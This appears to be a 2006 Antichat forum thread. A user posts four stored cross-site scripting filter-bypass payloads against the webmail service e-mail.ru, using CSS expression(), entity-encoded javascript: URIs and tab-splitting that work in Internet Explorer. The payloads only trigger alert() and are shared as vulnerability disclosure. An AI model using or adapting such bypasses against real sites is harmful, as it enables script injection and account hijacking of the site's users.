HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

xss на e-mail.ru(актив)
  #1  
Старый 17.12.2006, 09:51
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
С нами: 10715512

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию xss на e-mail.ru(актив)

Код:
<span style=top:expression(alert())></span>
<span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></span>
<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert()>
<img src="javascript	:alert()"> и прочие извращения с пробелами и табуляцией
работают в ie.
 
Ответить с цитированием

  #2  
Старый 17.12.2006, 10:09
†Romi4†
Постоянный
Регистрация: 06.02.2006
Сообщений: 409
С нами: 10662086

Репутация: 555
По умолчанию

тебе сюда:
http://forum.antichat.ru/thread21437.html
 
Ответить с цитированием

  #3  
Старый 17.12.2006, 10:14
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
С нами: 10715512

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

ну это актив, а не пасив. А там постятся пассивные xss на сколько я смог заметить.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
XSS worms Xex Статьи 0 02.10.2006 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.